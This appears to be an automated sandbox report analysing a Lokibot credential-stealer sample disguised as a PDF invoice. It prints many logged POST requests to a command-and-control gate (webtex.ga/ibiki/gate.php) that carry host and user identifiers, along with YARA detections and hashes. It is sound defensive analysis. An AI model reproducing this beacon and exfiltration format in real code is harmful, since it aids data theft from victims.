                                    Dec 3, 2020 10:03:02.613555908 CET309OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:02.630259037 CET310OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:02.672327995 CET310INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:19 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    9192.168.2.34971847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.492296934 CET77OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.509088993 CET77OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:32.556118011 CET77INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:49 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    90192.168.2.34981247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:02.888199091 CET311OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:02.904993057 CET311OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:02.951844931 CET311INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    91192.168.2.34981347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:03.157768011 CET312OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:03.175729990 CET312OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:03.217158079 CET313INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    92192.168.2.34981447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:03.503053904 CET313OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:03.519722939 CET314OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:03.562712908 CET314INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:20 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    93192.168.2.34981547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:03.856348038 CET315OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:03.873203039 CET315OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:03.913266897 CET315INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    94192.168.2.34981647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:04.112260103 CET316OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:04.129261971 CET316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:04.173197985 CET317INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    95192.168.2.34981747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:04.389681101 CET318OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:04.408771038 CET318OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:04.451117039 CET318INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    96192.168.2.34981847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:04.904412985 CET319OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:04.921765089 CET319OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:04.964256048 CET320INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    97192.168.2.34981947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:05.283814907 CET320OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:05.300465107 CET321OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:05.344181061 CET321INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    98192.168.2.34982047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:05.585961103 CET322OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:05.602524042 CET322OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:05.649936914 CET322INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    99192.168.2.34982147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:06.054061890 CET323OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:06.070720911 CET323OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:06.116899967 CET324INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Code Manipulations

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476 Parent PID: 5668

                                    General

                                    Start time:10:02:19
                                    Start date:03/12/2020
                                    Path:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe'
                                    Imagebase:0xc10000
                                    File size:359424 bytes
                                    MD5 hash:2349D50A67C2EF85661EF2BE6DEF2CC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.236197890.0000000004079000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmp, Author: Joe Security
                                    Reputation:low

                                    Chronological Activities

                                    Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 5572 Parent PID: 3476

                                    General

                                    Start time:10:02:25
                                    Start date:03/12/2020
                                    Path:C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xa60000
                                    File size:359424 bytes
                                    MD5 hash:2349D50A67C2EF85661EF2BE6DEF2CC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.499756661.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476 Parent PID: 5668 PI_Nov9071011998_ENTRUSTpdf.exeCOMMON

                                      Executed Functions

                                      Function 054F5C28, Relevance: .7, Instructions: 709COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.238287409.00000000054F0000.00000040.00000001.sdmp, Offset: 054F0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c7eefdc7a5ef9631496340d323f63e4230ff6f39853888ff6db7801389d6e3ac
                                      • Instruction ID: 631b94b791e47ba4b3add0cf4ae349299daf9f650b8c3fe663cc6b5e00b0a898
                                      • Opcode Fuzzy Hash: c7eefdc7a5ef9631496340d323f63e4230ff6f39853888ff6db7801389d6e3ac
                                      • Instruction Fuzzy Hash: D552FB347006448FCB99EB79C494ADAB7E3AFC9308F50486DD61A8B365DF75A805CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01589650, Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 01589896
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: bfea6e41ff016815060c56c3ddc1eefde4e6db09c29977d7c769b300eba1257a
                                      • Instruction ID: c8946f3a401cbeae4f335bba33d03b0d7f79de588800fc3e438bb05f29c5a94a
                                      • Opcode Fuzzy Hash: bfea6e41ff016815060c56c3ddc1eefde4e6db09c29977d7c769b300eba1257a
                                      • Instruction Fuzzy Hash: F6711870A00B059FDB64EF6AD4407AABBF1FF88208F10892DD546EBA50D735E805CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158DBA8, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0158FDCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 2cdf3ef4afd7bf45d25c230314da9fb6c40e16e339d3fc64f7a7146b4adc1a16
                                      • Instruction ID: e602d5630eeee853e64d0086a19828754c973f89f4cea120a5626d144ffa80f2
                                      • Opcode Fuzzy Hash: 2cdf3ef4afd7bf45d25c230314da9fb6c40e16e339d3fc64f7a7146b4adc1a16
                                      • Instruction Fuzzy Hash: 28511EB1C043489FDB15DFA9C884ADEBFB5BF88314F24856AE908AB251D7709845CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158DC08, Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0158FDCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: f6cfffbb1c43d952f7a376b2981af66dcd3320c019b5cb0a0d1c9800ec1bbb32
                                      • Instruction ID: b4bf33783508b81c551309f05d341fbd801f64e95d379e5a45eb3cb4b9f52825
                                      • Opcode Fuzzy Hash: f6cfffbb1c43d952f7a376b2981af66dcd3320c019b5cb0a0d1c9800ec1bbb32
                                      • Instruction Fuzzy Hash: AB51E1B1C003489FDF14DFA9C884ADEBFB5BF48314F24852AE919AB250D7709845CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158FCAD, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0158FDCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 0e917a89e1df0ea39a506e95f66c790932c7fcf319071ca1da11f789e21923f9
                                      • Instruction ID: 930a60dcfc17a2fafae08e66a45d5d3a61351e5451120c44925f665a91776058
                                      • Opcode Fuzzy Hash: 0e917a89e1df0ea39a506e95f66c790932c7fcf319071ca1da11f789e21923f9
                                      • Instruction Fuzzy Hash: 7351DFB1D003489FDB14DFA9C884ADEBFB5BF88314F24812AE919AB250D7709945CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0158DC24, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0158FDCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: CreateWindow
                                      • String ID:
                                      • API String ID: 716092398-0
                                      • Opcode ID: 456ade9454c7e61055d2f4fbe23c431aec8a2a64395cc49b8900bb780d5865f6
                                      • Instruction ID: fbf1879e7755b2257aff52b638d4d8d5e6d4a58d196f8caab13619a16740959f
                                      • Opcode Fuzzy Hash: 456ade9454c7e61055d2f4fbe23c431aec8a2a64395cc49b8900bb780d5865f6
                                      • Instruction Fuzzy Hash: 0951DFB1D00309DFDB14DFAAC884ADEBBB5BF88314F24852AE919BB250D7709845CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01585344, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 9fe85a64e1b9174e993eac52763eb7b5f5b8bf5daf645d02f8e34b6e83319cc9
                                      • Instruction ID: c9d5073f9d5acadab255cd690f2c8cf0cb8fbf5fea2086dae75ea8212aed0cdb
                                      • Opcode Fuzzy Hash: 9fe85a64e1b9174e993eac52763eb7b5f5b8bf5daf645d02f8e34b6e83319cc9
                                      • Instruction Fuzzy Hash: 6E4101B1D00618CFDB24EFA9C8847DDBBB5BF48309F24806AD408BB251DB74594ACFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01583CAC, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 01585401
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.235162436.0000000001580000.00000040.00000001.sdmp, Offset: 01580000, based on PE: false
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 3cf79ebd90762f56cf907d32bb75e6ece2e0f9910f937623aac326154ec77b8c
                                      • Instruction ID: ee57ba22a1a19f6a1ab361a60d813e7d4b31848094364679140d1fe9780abb0c
                                      • Opcode Fuzzy Hash: 3cf79ebd90762f56cf907d32bb75e6ece2e0f9910f937623aac326154ec77b8c
                                      • Instruction Fuzzy Hash: 7F41F370D00618CFDB24EFA9C8847CEBBB5BF48309F20806AD508BB251DB755949CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

